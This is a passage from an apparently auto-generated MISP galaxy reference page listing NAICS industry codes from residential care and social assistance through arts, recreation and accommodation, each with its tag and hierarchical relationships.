  • child-of: misp-galaxy:naics="623" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="623110" with estimative-language:likelihood-probability="likely"

62311

Nursing Care Facilities (Skilled Nursing Facilities)

The tag is: misp-galaxy:naics="62311"

62311 has relationships with:

  • child-of: misp-galaxy:naics="6231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="623110" with estimative-language:likelihood-probability="likely"

623110

Nursing Care Facilities (Skilled Nursing Facilities)

The tag is: misp-galaxy:naics="623110"

623110 has relationships with:

  • child-of: misp-galaxy:naics="6231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62311" with estimative-language:likelihood-probability="likely"

6232

Residential Intellectual and Developmental Disability, Mental Health, and Substance Abuse Facilities

The tag is: misp-galaxy:naics="6232"

6232 has relationships with:

  • child-of: misp-galaxy:naics="623" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="623210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62322" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="623220" with estimative-language:likelihood-probability="likely"

62321

Residential Intellectual and Developmental Disability Facilities

The tag is: misp-galaxy:naics="62321"

62321 has relationships with:

  • child-of: misp-galaxy:naics="6232" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="623210" with estimative-language:likelihood-probability="likely"

623210

Residential Intellectual and Developmental Disability Facilities

The tag is: misp-galaxy:naics="623210"

623210 has relationships with:

  • child-of: misp-galaxy:naics="6232" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62321" with estimative-language:likelihood-probability="likely"

62322

Residential Mental Health and Substance Abuse Facilities

The tag is: misp-galaxy:naics="62322"

62322 has relationships with:

  • child-of: misp-galaxy:naics="6232" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="623220" with estimative-language:likelihood-probability="likely"

623220

Residential Mental Health and Substance Abuse Facilities

The tag is: misp-galaxy:naics="623220"

623220 has relationships with:

  • child-of: misp-galaxy:naics="6232" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62322" with estimative-language:likelihood-probability="likely"

6233

Continuing Care Retirement Communities and Assisted Living Facilities for the Elderly

The tag is: misp-galaxy:naics="6233"

6233 has relationships with:

  • child-of: misp-galaxy:naics="623" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62331" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="623311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="623312" with estimative-language:likelihood-probability="likely"

62331

Continuing Care Retirement Communities and Assisted Living Facilities for the Elderly

The tag is: misp-galaxy:naics="62331"

62331 has relationships with:

  • child-of: misp-galaxy:naics="6233" with estimative-language:likelihood-probability="likely"

623311

Continuing Care Retirement Communities

The tag is: misp-galaxy:naics="623311"

623311 has relationships with:

  • child-of: misp-galaxy:naics="6233" with estimative-language:likelihood-probability="likely"

623312

Assisted Living Facilities for the Elderly

The tag is: misp-galaxy:naics="623312"

623312 has relationships with:

  • child-of: misp-galaxy:naics="6233" with estimative-language:likelihood-probability="likely"

6239

Other Residential Care Facilities

The tag is: misp-galaxy:naics="6239"

6239 has relationships with:

  • child-of: misp-galaxy:naics="623" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62399" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="623990" with estimative-language:likelihood-probability="likely"

62399

Other Residential Care Facilities

The tag is: misp-galaxy:naics="62399"

62399 has relationships with:

  • child-of: misp-galaxy:naics="6239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="623990" with estimative-language:likelihood-probability="likely"

623990

Other Residential Care Facilities

The tag is: misp-galaxy:naics="623990"

623990 has relationships with:

  • child-of: misp-galaxy:naics="6239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62399" with estimative-language:likelihood-probability="likely"

624

Social Assistance

The tag is: misp-galaxy:naics="624"

624 has relationships with:

  • child-of: misp-galaxy:naics="62" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6241" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6242" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6243" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6244" with estimative-language:likelihood-probability="likely"

6241

Individual and Family Services

The tag is: misp-galaxy:naics="6241"

6241 has relationships with:

  • child-of: misp-galaxy:naics="624" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="624110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="624120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62419" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="624190" with estimative-language:likelihood-probability="likely"

62411

Child and Youth Services

The tag is: misp-galaxy:naics="62411"

62411 has relationships with:

  • child-of: misp-galaxy:naics="6241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="624110" with estimative-language:likelihood-probability="likely"

624110

Child and Youth Services

The tag is: misp-galaxy:naics="624110"

624110 has relationships with:

  • child-of: misp-galaxy:naics="6241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62411" with estimative-language:likelihood-probability="likely"

62412

Services for the Elderly and Persons with Disabilities

The tag is: misp-galaxy:naics="62412"

62412 has relationships with:

  • child-of: misp-galaxy:naics="6241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="624120" with estimative-language:likelihood-probability="likely"

624120

Services for the Elderly and Persons with Disabilities

The tag is: misp-galaxy:naics="624120"

624120 has relationships with:

  • child-of: misp-galaxy:naics="6241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62412" with estimative-language:likelihood-probability="likely"

62419

Other Individual and Family Services

The tag is: misp-galaxy:naics="62419"

62419 has relationships with:

  • child-of: misp-galaxy:naics="6241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="624190" with estimative-language:likelihood-probability="likely"

624190

Other Individual and Family Services

The tag is: misp-galaxy:naics="624190"

624190 has relationships with:

  • child-of: misp-galaxy:naics="6241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62419" with estimative-language:likelihood-probability="likely"

6242

Community Food and Housing, and Emergency and Other Relief Services

The tag is: misp-galaxy:naics="6242"

6242 has relationships with:

  • child-of: misp-galaxy:naics="624" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62421" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="624210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62422" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="624221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="624229" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62423" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="624230" with estimative-language:likelihood-probability="likely"

62421

Community Food Services

The tag is: misp-galaxy:naics="62421"

62421 has relationships with:

  • child-of: misp-galaxy:naics="6242" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="624210" with estimative-language:likelihood-probability="likely"

624210

Community Food Services

The tag is: misp-galaxy:naics="624210"

624210 has relationships with:

  • child-of: misp-galaxy:naics="6242" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62421" with estimative-language:likelihood-probability="likely"

62422

Community Housing Services

The tag is: misp-galaxy:naics="62422"

62422 has relationships with:

  • child-of: misp-galaxy:naics="6242" with estimative-language:likelihood-probability="likely"

624221

Temporary Shelters

The tag is: misp-galaxy:naics="624221"

624221 has relationships with:

  • child-of: misp-galaxy:naics="6242" with estimative-language:likelihood-probability="likely"

624229

Other Community Housing Services

The tag is: misp-galaxy:naics="624229"

624229 has relationships with:

  • child-of: misp-galaxy:naics="6242" with estimative-language:likelihood-probability="likely"

62423

Emergency and Other Relief Services

The tag is: misp-galaxy:naics="62423"

62423 has relationships with:

  • child-of: misp-galaxy:naics="6242" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="624230" with estimative-language:likelihood-probability="likely"

624230

Emergency and Other Relief Services

The tag is: misp-galaxy:naics="624230"

624230 has relationships with:

  • child-of: misp-galaxy:naics="6242" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62423" with estimative-language:likelihood-probability="likely"

6243

Vocational Rehabilitation Services

The tag is: misp-galaxy:naics="6243"

6243 has relationships with:

  • child-of: misp-galaxy:naics="624" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62431" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="624310" with estimative-language:likelihood-probability="likely"

62431

Vocational Rehabilitation Services

The tag is: misp-galaxy:naics="62431"

62431 has relationships with:

  • child-of: misp-galaxy:naics="6243" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="624310" with estimative-language:likelihood-probability="likely"

624310

Vocational Rehabilitation Services

The tag is: misp-galaxy:naics="624310"

624310 has relationships with:

  • child-of: misp-galaxy:naics="6243" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62431" with estimative-language:likelihood-probability="likely"

6244

Child Care Services

The tag is: misp-galaxy:naics="6244"

6244 has relationships with:

  • child-of: misp-galaxy:naics="624" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62441" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="624410" with estimative-language:likelihood-probability="likely"

62441

Child Care Services

The tag is: misp-galaxy:naics="62441"

62441 has relationships with:

  • child-of: misp-galaxy:naics="6244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="624410" with estimative-language:likelihood-probability="likely"

624410

Child Care Services

The tag is: misp-galaxy:naics="624410"

624410 has relationships with:

  • child-of: misp-galaxy:naics="6244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62441" with estimative-language:likelihood-probability="likely"

71

Arts, Entertainment, and Recreation

The tag is: misp-galaxy:naics="71"

71 has relationships with:

  • parent-of: misp-galaxy:naics="711" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="712" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="713" with estimative-language:likelihood-probability="likely"

711

Performing Arts, Spectator Sports, and Related Industries

The tag is: misp-galaxy:naics="711"

711 has relationships with:

  • child-of: misp-galaxy:naics="71" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7115" with estimative-language:likelihood-probability="likely"

7111

Performing Arts Companies

The tag is: misp-galaxy:naics="7111"

7111 has relationships with:

  • child-of: misp-galaxy:naics="711" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="711110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="711120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="711130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71119" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="711190" with estimative-language:likelihood-probability="likely"

71111

Theater Companies and Dinner Theaters

The tag is: misp-galaxy:naics="71111"

71111 has relationships with:

  • child-of: misp-galaxy:naics="7111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="711110" with estimative-language:likelihood-probability="likely"

711110

Theater Companies and Dinner Theaters

The tag is: misp-galaxy:naics="711110"

711110 has relationships with:

  • child-of: misp-galaxy:naics="7111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71111" with estimative-language:likelihood-probability="likely"

71112

Dance Companies

The tag is: misp-galaxy:naics="71112"

71112 has relationships with:

  • child-of: misp-galaxy:naics="7111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="711120" with estimative-language:likelihood-probability="likely"

711120

Dance Companies

The tag is: misp-galaxy:naics="711120"

711120 has relationships with:

  • child-of: misp-galaxy:naics="7111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71112" with estimative-language:likelihood-probability="likely"

71113

Musical Groups and Artists

The tag is: misp-galaxy:naics="71113"

71113 has relationships with:

  • child-of: misp-galaxy:naics="7111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="711130" with estimative-language:likelihood-probability="likely"

711130

Musical Groups and Artists

The tag is: misp-galaxy:naics="711130"

711130 has relationships with:

  • child-of: misp-galaxy:naics="7111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71113" with estimative-language:likelihood-probability="likely"

71119

Other Performing Arts Companies

The tag is: misp-galaxy:naics="71119"

71119 has relationships with:

  • child-of: misp-galaxy:naics="7111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="711190" with estimative-language:likelihood-probability="likely"

711190

Other Performing Arts Companies

The tag is: misp-galaxy:naics="711190"

711190 has relationships with:

  • child-of: misp-galaxy:naics="7111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71119" with estimative-language:likelihood-probability="likely"

7112

Spectator Sports

The tag is: misp-galaxy:naics="7112"

7112 has relationships with:

  • child-of: misp-galaxy:naics="711" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="711211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="711212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="711219" with estimative-language:likelihood-probability="likely"

71121

Spectator Sports

The tag is: misp-galaxy:naics="71121"

71121 has relationships with:

  • child-of: misp-galaxy:naics="7112" with estimative-language:likelihood-probability="likely"

711211

Sports Teams and Clubs

The tag is: misp-galaxy:naics="711211"

711211 has relationships with:

  • child-of: misp-galaxy:naics="7112" with estimative-language:likelihood-probability="likely"

711212

Racetracks

The tag is: misp-galaxy:naics="711212"

711212 has relationships with:

  • child-of: misp-galaxy:naics="7112" with estimative-language:likelihood-probability="likely"

711219

Other Spectator Sports

The tag is: misp-galaxy:naics="711219"

711219 has relationships with:

  • child-of: misp-galaxy:naics="7112" with estimative-language:likelihood-probability="likely"

7113

Promoters of Performing Arts, Sports, and Similar Events

The tag is: misp-galaxy:naics="7113"

7113 has relationships with:

  • child-of: misp-galaxy:naics="711" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="711310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71132" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="711320" with estimative-language:likelihood-probability="likely"

71131

Promoters of Performing Arts, Sports, and Similar Events with Facilities

The tag is: misp-galaxy:naics="71131"

71131 has relationships with:

  • child-of: misp-galaxy:naics="7113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="711310" with estimative-language:likelihood-probability="likely"

711310

Promoters of Performing Arts, Sports, and Similar Events with Facilities

The tag is: misp-galaxy:naics="711310"

711310 has relationships with:

  • child-of: misp-galaxy:naics="7113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71131" with estimative-language:likelihood-probability="likely"

71132

Promoters of Performing Arts, Sports, and Similar Events without Facilities

The tag is: misp-galaxy:naics="71132"

71132 has relationships with:

  • child-of: misp-galaxy:naics="7113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="711320" with estimative-language:likelihood-probability="likely"

711320

Promoters of Performing Arts, Sports, and Similar Events without Facilities

The tag is: misp-galaxy:naics="711320"

711320 has relationships with:

  • child-of: misp-galaxy:naics="7113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71132" with estimative-language:likelihood-probability="likely"

7114

Agents and Managers for Artists, Athletes, Entertainers, and Other Public Figures

The tag is: misp-galaxy:naics="7114"

7114 has relationships with:

  • child-of: misp-galaxy:naics="711" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71141" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="711410" with estimative-language:likelihood-probability="likely"

71141

Agents and Managers for Artists, Athletes, Entertainers, and Other Public Figures

The tag is: misp-galaxy:naics="71141"

71141 has relationships with:

  • child-of: misp-galaxy:naics="7114" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="711410" with estimative-language:likelihood-probability="likely"

711410

Agents and Managers for Artists, Athletes, Entertainers, and Other Public Figures

The tag is: misp-galaxy:naics="711410"

711410 has relationships with:

  • child-of: misp-galaxy:naics="7114" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71141" with estimative-language:likelihood-probability="likely"

7115

Independent Artists, Writers, and Performers

The tag is: misp-galaxy:naics="7115"

7115 has relationships with:

  • child-of: misp-galaxy:naics="711" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71151" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="711510" with estimative-language:likelihood-probability="likely"

71151

Independent Artists, Writers, and Performers

The tag is: misp-galaxy:naics="71151"

71151 has relationships with:

  • child-of: misp-galaxy:naics="7115" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="711510" with estimative-language:likelihood-probability="likely"

711510

Independent Artists, Writers, and Performers

The tag is: misp-galaxy:naics="711510"

711510 has relationships with:

  • child-of: misp-galaxy:naics="7115" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71151" with estimative-language:likelihood-probability="likely"

712

Museums, Historical Sites, and Similar Institutions

The tag is: misp-galaxy:naics="712"

712 has relationships with:

  • child-of: misp-galaxy:naics="71" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7121" with estimative-language:likelihood-probability="likely"

7121

Museums, Historical Sites, and Similar Institutions

The tag is: misp-galaxy:naics="7121"

7121 has relationships with:

  • child-of: misp-galaxy:naics="712" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="712110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="712120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71213" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="712130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71219" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="712190" with estimative-language:likelihood-probability="likely"

71211

Museums

The tag is: misp-galaxy:naics="71211"

71211 has relationships with:

  • child-of: misp-galaxy:naics="7121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="712110" with estimative-language:likelihood-probability="likely"

712110

Museums

The tag is: misp-galaxy:naics="712110"

712110 has relationships with:

  • child-of: misp-galaxy:naics="7121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71211" with estimative-language:likelihood-probability="likely"

71212

Historical Sites

The tag is: misp-galaxy:naics="71212"

71212 has relationships with:

  • child-of: misp-galaxy:naics="7121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="712120" with estimative-language:likelihood-probability="likely"

712120

Historical Sites

The tag is: misp-galaxy:naics="712120"

712120 has relationships with:

  • child-of: misp-galaxy:naics="7121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71212" with estimative-language:likelihood-probability="likely"

71213

Zoos and Botanical Gardens

The tag is: misp-galaxy:naics="71213"

71213 has relationships with:

  • child-of: misp-galaxy:naics="7121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="712130" with estimative-language:likelihood-probability="likely"

712130

Zoos and Botanical Gardens

The tag is: misp-galaxy:naics="712130"

712130 has relationships with:

  • child-of: misp-galaxy:naics="7121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71213" with estimative-language:likelihood-probability="likely"

71219

Nature Parks and Other Similar Institutions

The tag is: misp-galaxy:naics="71219"

71219 has relationships with:

  • child-of: misp-galaxy:naics="7121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="712190" with estimative-language:likelihood-probability="likely"

712190

Nature Parks and Other Similar Institutions

The tag is: misp-galaxy:naics="712190"

712190 has relationships with:

  • child-of: misp-galaxy:naics="7121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71219" with estimative-language:likelihood-probability="likely"

713

Amusement, Gambling, and Recreation Industries

The tag is: misp-galaxy:naics="713"

713 has relationships with:

  • child-of: misp-galaxy:naics="71" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7132" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7139" with estimative-language:likelihood-probability="likely"

7131

Amusement Parks and Arcades

The tag is: misp-galaxy:naics="7131"

7131 has relationships with:

  • child-of: misp-galaxy:naics="713" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="713110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="713120" with estimative-language:likelihood-probability="likely"

71311

Amusement and Theme Parks

The tag is: misp-galaxy:naics="71311"

71311 has relationships with:

  • child-of: misp-galaxy:naics="7131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="713110" with estimative-language:likelihood-probability="likely"

713110

Amusement and Theme Parks

The tag is: misp-galaxy:naics="713110"

713110 has relationships with:

  • child-of: misp-galaxy:naics="7131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71311" with estimative-language:likelihood-probability="likely"

71312

Amusement Arcades

The tag is: misp-galaxy:naics="71312"

71312 has relationships with:

  • child-of: misp-galaxy:naics="7131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="713120" with estimative-language:likelihood-probability="likely"

713120

Amusement Arcades

The tag is: misp-galaxy:naics="713120"

713120 has relationships with:

  • child-of: misp-galaxy:naics="7131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71312" with estimative-language:likelihood-probability="likely"

7132

Gambling Industries

The tag is: misp-galaxy:naics="7132"

7132 has relationships with:

  • child-of: misp-galaxy:naics="713" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="713210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71329" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="713290" with estimative-language:likelihood-probability="likely"

71321

Casinos (except Casino Hotels)

The tag is: misp-galaxy:naics="71321"

71321 has relationships with:

  • child-of: misp-galaxy:naics="7132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="713210" with estimative-language:likelihood-probability="likely"

713210

Casinos (except Casino Hotels)

The tag is: misp-galaxy:naics="713210"

713210 has relationships with:

  • child-of: misp-galaxy:naics="7132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71321" with estimative-language:likelihood-probability="likely"

71329

Other Gambling Industries

The tag is: misp-galaxy:naics="71329"

71329 has relationships with:

  • child-of: misp-galaxy:naics="7132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="713290" with estimative-language:likelihood-probability="likely"

713290

Other Gambling Industries

The tag is: misp-galaxy:naics="713290"

713290 has relationships with:

  • child-of: misp-galaxy:naics="7132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71329" with estimative-language:likelihood-probability="likely"

7139

Other Amusement and Recreation Industries

The tag is: misp-galaxy:naics="7139"

7139 has relationships with:

  • child-of: misp-galaxy:naics="713" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71391" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="713910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71392" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="713920" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71393" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="713930" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71394" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="713940" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71395" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="713950" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71399" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="713990" with estimative-language:likelihood-probability="likely"

71391

Golf Courses and Country Clubs

The tag is: misp-galaxy:naics="71391"

71391 has relationships with:

  • child-of: misp-galaxy:naics="7139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="713910" with estimative-language:likelihood-probability="likely"

713910

Golf Courses and Country Clubs

The tag is: misp-galaxy:naics="713910"

713910 has relationships with:

  • child-of: misp-galaxy:naics="7139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71391" with estimative-language:likelihood-probability="likely"

71392

Skiing Facilities

The tag is: misp-galaxy:naics="71392"

71392 has relationships with:

  • child-of: misp-galaxy:naics="7139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="713920" with estimative-language:likelihood-probability="likely"

713920

Skiing Facilities

The tag is: misp-galaxy:naics="713920"

713920 has relationships with:

  • child-of: misp-galaxy:naics="7139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71392" with estimative-language:likelihood-probability="likely"

71393

Marinas

The tag is: misp-galaxy:naics="71393"

71393 has relationships with:

  • child-of: misp-galaxy:naics="7139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="713930" with estimative-language:likelihood-probability="likely"

713930

Marinas

The tag is: misp-galaxy:naics="713930"

713930 has relationships with:

  • child-of: misp-galaxy:naics="7139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71393" with estimative-language:likelihood-probability="likely"

71394

Fitness and Recreational Sports Centers

The tag is: misp-galaxy:naics="71394"

71394 has relationships with:

  • child-of: misp-galaxy:naics="7139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="713940" with estimative-language:likelihood-probability="likely"

713940

Fitness and Recreational Sports Centers

The tag is: misp-galaxy:naics="713940"

713940 has relationships with:

  • child-of: misp-galaxy:naics="7139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71394" with estimative-language:likelihood-probability="likely"

71395

Bowling Centers

The tag is: misp-galaxy:naics="71395"

71395 has relationships with:

  • child-of: misp-galaxy:naics="7139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="713950" with estimative-language:likelihood-probability="likely"

713950

Bowling Centers

The tag is: misp-galaxy:naics="713950"

713950 has relationships with:

  • child-of: misp-galaxy:naics="7139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71395" with estimative-language:likelihood-probability="likely"

71399

All Other Amusement and Recreation Industries

The tag is: misp-galaxy:naics="71399"

71399 has relationships with:

  • child-of: misp-galaxy:naics="7139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="713990" with estimative-language:likelihood-probability="likely"

713990

All Other Amusement and Recreation Industries

The tag is: misp-galaxy:naics="713990"

713990 has relationships with:

  • child-of: misp-galaxy:naics="7139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71399" with estimative-language:likelihood-probability="likely"

72

Accommodation and Food Services

The tag is: misp-galaxy:naics="72"

72 has relationships with:

  • parent-of: misp-galaxy:naics="721" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="722" with estimative-language:likelihood-probability="likely"

721

Accommodation

The tag is: misp-galaxy:naics="721"

721 has relationships with:

  • child-of: misp-galaxy:naics="72" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7213" with estimative-language:likelihood-probability="likely"

7211

Traveler Accommodation

The tag is: misp-galaxy:naics="7211"

7211 has relationships with:

  • child-of: misp-galaxy:naics="721" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="72111" with estimative-language:likelihood-probability="likely"

